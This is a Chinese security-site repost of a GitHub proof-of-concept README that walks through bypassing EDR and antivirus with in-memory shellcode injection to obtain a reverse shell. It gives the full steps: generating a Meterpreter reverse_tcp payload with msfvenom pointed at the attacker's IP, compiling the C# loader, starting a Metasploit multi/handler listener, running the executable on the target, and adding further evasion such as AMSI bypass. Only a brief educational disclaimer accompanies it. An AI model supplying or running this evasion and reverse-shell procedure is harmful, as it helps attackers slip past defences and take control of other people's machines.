【Exp】绕过 EDR 防病毒软件以获取 Shell 访问权限

admin 2024年10月7日00:00:43评论25 views字数 1441阅读4分48秒阅读模式

EDR 和防病毒绕过以获得 Shell 访问权限

此仓库包含了一个 概念验证 (PoC) ,用于通过内存注入技术绕过 EDR 和防病毒解决方案。代码执行了一个生成反向 Shell 的 shellcode,成功规避了各种安全机制的检测。

描述

此项目展示了如何使用 Windows API 函数(如 VirtualAllocCreateThreadWaitForSingleObject)绕过 EDR 和防病毒保护。有效载荷直接注入到进程内存中,不会被安全工具检测到,从而与远程系统建立连接以实现反向 Shell。

免责声明: 本代码仅用于教育目的。请负责任地使用,并且仅在您有明确权限进行测试的环境中使用。

特性

  • 绕过标准的 EDR 和防病毒解决方案
  • 在内存中执行 shellcode 以创建反向 Shell
  • 使用 VirtualAllocCreateThread 将有效载荷直接注入进程内存

要求

  • Windows 操作系统(已在 Windows 11 Pro 上测试)
  • Kali Linux(用于反向 Shell 监听器)
  • Visual Studio 或任何 C# 编译器

编译和运行步骤

1. 克隆仓库

https://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access.git
cd EDR-Antivirus-Bypass-Shell-Access

2. 修改 Shellcode

编译前,请确保修改 shellcode 以指向您自己的 IP 地址和端口用于反向 Shell。您可以使用 msfvenom 生成 shellcode:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> -f csharp

将生成的 shellcode 替换 Program.cs 中的 byte[] buf 部分。

3. 编译代码

在 Visual Studio 中打开项目,或使用以下命令使用 .NET SDK 编译代码:

csc bypass.cs

或者,您可以使用 Release 模式进行编译以获得更好的优化:

csc -optimize bypass.cs

4. 在 Kali 上启动监听器

在您的 Kali Linux 机器上启动监听器以捕获反向 Shell。在 Metasploit 中使用以下命令:

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
set LPORT <YOUR_PORT>
run

5. 执行有效载荷

将编译好的 .exe 文件传输到 Windows 机器上。您可以手动执行该文件或使用其他方法运行该文件:

bypass.exe
  1. 获取 Shell

一旦在目标机器上执行了有效载荷,您应该会在 Metasploit 控制台中看到一个反向 Shell 会话。从那里,您可以与系统进行交互:

meterpreter > sysinfo
meterpreter > shell
  1. 其他绕过技术

为了避免被高级 EDR 解决方案检测到,可以考虑使用诸如进程注入、混淆或 AMSI 绕过等技术。此 PoC 可以通过这些方法进行扩展,以实现更强大的规避。

https://github.com/murat-exp/EDR-Antivirus-Bypass-to-Gain-Shell-Access

原文始发于微信公众号(独眼情报):【Exp】绕过 EDR 防病毒软件以获取 Shell 访问权限

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日00:00:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Exp】绕过 EDR 防病毒软件以获取 Shell 访问权限https://cn-sec.com/archives/3217803.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息